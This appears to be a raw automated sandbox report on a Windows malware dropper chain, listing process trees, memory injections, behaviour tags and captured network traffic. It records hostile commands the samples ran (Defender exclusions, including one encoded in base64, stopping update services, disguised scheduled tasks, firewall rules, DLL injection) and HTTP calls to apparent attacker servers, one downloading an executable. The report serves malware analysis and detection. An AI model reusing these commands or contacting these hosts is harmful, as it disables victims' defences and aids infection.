PID 4420 wrote to memory of 1264	4420	dc62fa6400ed62c5dade12c984fb1ffc.exe	86
PID 1264 wrote to memory of 1224	1264	Vq4Rw14.exe	88
PID 1264 wrote to memory of 1224	1264	Vq4Rw14.exe	88
PID 1264 wrote to memory of 1224	1264	Vq4Rw14.exe	88
PID 1224 wrote to memory of 3508	1224	MU2Ae27.exe	90
PID 1224 wrote to memory of 3508	1224	MU2Ae27.exe	90
PID 1224 wrote to memory of 3508	1224	MU2Ae27.exe	90
PID 3508 wrote to memory of 3644	3508	2OP2281.exe	93
PID 3508 wrote to memory of 3644	3508	2OP2281.exe	93
PID 3508 wrote to memory of 3644	3508	2OP2281.exe	93
PID 3508 wrote to memory of 3644	3508	2OP2281.exe	93
PID 3508 wrote to memory of 3644	3508	2OP2281.exe	93
PID 3508 wrote to memory of 3644	3508	2OP2281.exe	93
PID 3508 wrote to memory of 3644	3508	2OP2281.exe	93
PID 3508 wrote to memory of 3644	3508	2OP2281.exe	93
PID 1224 wrote to memory of 3084	1224	MU2Ae27.exe	94
PID 1224 wrote to memory of 3084	1224	MU2Ae27.exe	94
PID 1224 wrote to memory of 3084	1224	MU2Ae27.exe	94
PID 3084 wrote to memory of 1320	3084	4fn811TA.exe	96
PID 3084 wrote to memory of 1320	3084	4fn811TA.exe	96
PID 3084 wrote to memory of 1320	3084	4fn811TA.exe	96
PID 3084 wrote to memory of 4844	3084	4fn811TA.exe	97
PID 3084 wrote to memory of 4844	3084	4fn811TA.exe	97
PID 3084 wrote to memory of 4844	3084	4fn811TA.exe	97
PID 3084 wrote to memory of 4844	3084	4fn811TA.exe	97
PID 3084 wrote to memory of 4844	3084	4fn811TA.exe	97
PID 3084 wrote to memory of 4844	3084	4fn811TA.exe	97
PID 3084 wrote to memory of 4844	3084	4fn811TA.exe	97
PID 3084 wrote to memory of 4844	3084	4fn811TA.exe	97
PID 3084 wrote to memory of 4844	3084	4fn811TA.exe	97
PID 3084 wrote to memory of 4844	3084	4fn811TA.exe	97
PID 1264 wrote to memory of 2228	1264	Vq4Rw14.exe	98
PID 1264 wrote to memory of 2228	1264	Vq4Rw14.exe	98
PID 1264 wrote to memory of 2228	1264	Vq4Rw14.exe	98
PID 4420 wrote to memory of 2164	4420	dc62fa6400ed62c5dade12c984fb1ffc.exe	103
PID 4420 wrote to memory of 2164	4420	dc62fa6400ed62c5dade12c984fb1ffc.exe	103
PID 4420 wrote to memory of 2164	4420	dc62fa6400ed62c5dade12c984fb1ffc.exe	103
PID 3264 wrote to memory of 232	3264	Explorer.EXE	113
PID 3264 wrote to memory of 232	3264	Explorer.EXE	113
PID 3264 wrote to memory of 232	3264	Explorer.EXE	113
PID 3264 wrote to memory of 2076	3264	Explorer.EXE	114
PID 3264 wrote to memory of 2076	3264	Explorer.EXE	114
PID 3264 wrote to memory of 2076	3264	Explorer.EXE	114
PID 3264 wrote to memory of 3796	3264	Explorer.EXE	116
PID 3264 wrote to memory of 3796	3264	Explorer.EXE	116
PID 3264 wrote to memory of 3796	3264	Explorer.EXE	116
PID 232 wrote to memory of 4468	232	1DB4.exe	118
PID 232 wrote to memory of 4468	232	1DB4.exe	118
PID 232 wrote to memory of 4468	232	1DB4.exe	118
PID 232 wrote to memory of 3588	232	1DB4.exe	119
PID 232 wrote to memory of 3588	232	1DB4.exe	119
PID 232 wrote to memory of 3588	232	1DB4.exe	119
PID 3264 wrote to memory of 2796	3264	Explorer.EXE	124
PID 3264 wrote to memory of 2796	3264	Explorer.EXE	124
PID 3264 wrote to memory of 2796	3264	Explorer.EXE	124
PID 4468 wrote to memory of 3136	4468	InstallSetup5.exe	122
PID 4468 wrote to memory of 3136	4468	InstallSetup5.exe	122
PID 4468 wrote to memory of 3136	4468	InstallSetup5.exe	122
PID 232 wrote to memory of 1388	232	1DB4.exe	120
PID 232 wrote to memory of 1388	232	1DB4.exe	120
PID 232 wrote to memory of 1388	232	1DB4.exe	120
PID 232 wrote to memory of 2440	232	1DB4.exe	121

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3264
- C:\Users\Admin\AppData\Local\Temp\dc62fa6400ed62c5dade12c984fb1ffc.exe
  "C:\Users\Admin\AppData\Local\Temp\dc62fa6400ed62c5dade12c984fb1ffc.exe"
  2⤵
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:4420
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Vq4Rw14.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Vq4Rw14.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:1264
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\MU2Ae27.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\MU2Ae27.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:1224
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2OP2281.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2OP2281.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:3508
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        
        PID:3644
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4fn811TA.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4fn811TA.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:3084
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        
        PID:1320
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        
        PID:4844
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5Iq7mj5.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5Iq7mj5.exe
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      PID:2228
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Qs8fx8.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Qs8fx8.exe
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - Executes dropped EXE
    - Windows security modification
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2164
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2164 -s 1072
      4⤵
      Program crash
      PID:1328
- C:\Users\Admin\AppData\Local\Temp\1DB4.exe
  C:\Users\Admin\AppData\Local\Temp\1DB4.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:232
- - C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
    "C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4468
  - - C:\Users\Admin\AppData\Local\Temp\Broom.exe
      C:\Users\Admin\AppData\Local\Temp\Broom.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:3136
- - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:3588
  - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious behavior: MapViewOfSection
      PID:3872
- - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
    "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1388
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4320
  - - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
      "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
      4⤵
      Executes dropped EXE
      Checks for VirtualBox DLLs, possible anti-VM trick
      Modifies data under HKEY_USERS
      PID:2688
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:4880
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:2816
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:3036
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:640
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Modifies data under HKEY_USERS
        
        PID:2200
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        
        PID:1628
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:3548
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:1404
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2164
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        6⤵
        
        PID:1964
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:4076
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:4724
      - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        6⤵
        
        PID:4148
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:2672
      - C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        6⤵
        
        PID:680
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        7⤵
        
        PID:4048
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        8⤵
        Launches sc.exe
        
        PID:1856
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        6⤵
        
        PID:4064
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        7⤵
        Launches sc.exe
        
        PID:3372
- - C:\Users\Admin\AppData\Local\Temp\latestX.exe
    "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:2440
- C:\Users\Admin\AppData\Local\Temp\23C0.exe
  C:\Users\Admin\AppData\Local\Temp\23C0.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2076
- C:\Users\Admin\AppData\Local\Temp\2846.exe
  C:\Users\Admin\AppData\Local\Temp\2846.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:3796
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 784
    3⤵
    - Program crash
    PID:3392
- C:\Users\Admin\AppData\Local\Temp\2B83.exe
  C:\Users\Admin\AppData\Local\Temp\2B83.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2796
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2796 -s 784
    3⤵
    - Program crash
    PID:4796
- C:\Users\Admin\AppData\Local\Temp\89B1.exe
  C:\Users\Admin\AppData\Local\Temp\89B1.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4604
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"
    3⤵
    PID:368
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:3972
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:3388
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4452
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:952
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2796
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:3796
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:3532
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:3864
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3764
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5076
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1224
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:2164
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2252
- C:\Users\Admin\AppData\Local\Temp\CC87.exe
  C:\Users\Admin\AppData\Local\Temp\CC87.exe
  2⤵
  - Executes dropped EXE
  PID:3540
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    3⤵
    PID:536
- C:\Users\Admin\AppData\Local\Temp\CFA5.exe
  C:\Users\Admin\AppData\Local\Temp\CFA5.exe
  2⤵
  - Executes dropped EXE
  PID:2796
- C:\Users\Admin\AppData\Local\Temp\D340.exe
  C:\Users\Admin\AppData\Local\Temp\D340.exe
  2⤵
  - Executes dropped EXE
  PID:1212
- C:\Users\Admin\AppData\Local\Temp\E14B.exe
  C:\Users\Admin\AppData\Local\Temp\E14B.exe
  2⤵
  - Executes dropped EXE
  PID:3568
- C:\Users\Admin\AppData\Local\Temp\E6DA.exe
  C:\Users\Admin\AppData\Local\Temp\E6DA.exe
  2⤵
  - Executes dropped EXE
  PID:4932
- - C:\Windows\SysWOW64\cmd.exe
    cmd /k cmd < Layers & exit
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3972
  - - C:\Windows\SysWOW64\cmd.exe
      cmd
      4⤵
      PID:2120
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:3580
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
        5⤵
        
        PID:4596
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:2988
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa.exe"
        5⤵
        
        PID:2096
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c mkdir 16753
        5⤵
        
        PID:1184
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b Button + Offices + Participants + Foreign + String 16753\Ent.pif
        5⤵
        
        PID:2272
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b Duncan + Wagon + Vagina 16753\b
        5⤵
        
        PID:1856
    - - C:\Users\Admin\AppData\Local\Temp\662\16753\Ent.pif
        
        16753\Ent.pif 16753\b
        5⤵
        
        PID:1048
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:4036
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:4608
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2120
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:3384
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2316
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:4920
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1852
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:3200
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:3652
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  PID:3044
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:4404
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:1100
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:1452
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:4888
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:868
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:3820
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  PID:4484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2164 -ip 2164
1⤵
PID:2692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3796 -ip 3796
1⤵
PID:1760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2796 -ip 2796
1⤵
PID:3776

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Executes dropped EXE
PID:2344

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcACoALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlAA==
1⤵
PID:1764

C:\Users\Admin\AppData\Roaming\Items\Current.exe
C:\Users\Admin\AppData\Roaming\Items\Current.exe
1⤵
PID:2148
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
  2⤵
  PID:3536

C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"
1⤵
PID:4100

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:232

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

71.31.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

71.31.126.40.in-addr.arpa

IN PTR

Response
DNS

254.105.26.67.in-addr.arpa

Remote address:

8.8.8.8:53

Request

254.105.26.67.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

241.154.82.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.154.82.20.in-addr.arpa

IN PTR

Response
DNS

146.78.124.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

146.78.124.51.in-addr.arpa

IN PTR

Response
DNS

198.1.85.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

198.1.85.104.in-addr.arpa

IN PTR

Response

198.1.85.104.in-addr.arpa

IN PTR

a104-85-1-198deploystaticakamaitechnologiescom
DNS

2.136.104.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

2.136.104.51.in-addr.arpa

IN PTR

Response
DNS

208.194.73.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

208.194.73.20.in-addr.arpa

IN PTR

Response
POST

http://5.42.92.190/fks/index.php

Explorer.EXE

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://lvndofdthmsjm.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 303
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Fri, 17 Nov 2023 16:06:15 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Explorer.EXE

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://fpwnfuriqmnds.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 151
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Fri, 17 Nov 2023 16:06:15 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 41
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
GET

http://5.42.65.80/newrock.exe

Explorer.EXE

Remote address:

5.42.65.80:80

Request

GET /newrock.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 5.42.65.80

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 17 Nov 2023 16:06:15 GMT
Content-Type: application/octet-stream
Content-Length: 13147136
Last-Modified: Thu, 16 Nov 2023 21:06:43 GMT
Connection: keep-alive
ETag: "65568463-c89c00"
Accept-Ranges: bytes
DNS

26.165.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

26.165.165.52.in-addr.arpa

IN PTR

Response
DNS

190.92.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

190.92.42.5.in-addr.arpa

IN PTR

Response

190.92.42.5.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
DNS

80.65.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

80.65.42.5.in-addr.arpa

IN PTR

Response
DNS

15.164.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.164.165.52.in-addr.arpa

IN PTR

Response
DNS

254.111.26.67.in-addr.arpa

Remote address:

8.8.8.8:53

Request

254.111.26.67.in-addr.arpa

IN PTR

Response
POST

http://5.42.92.190/fks/index.php

Explorer.EXE

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
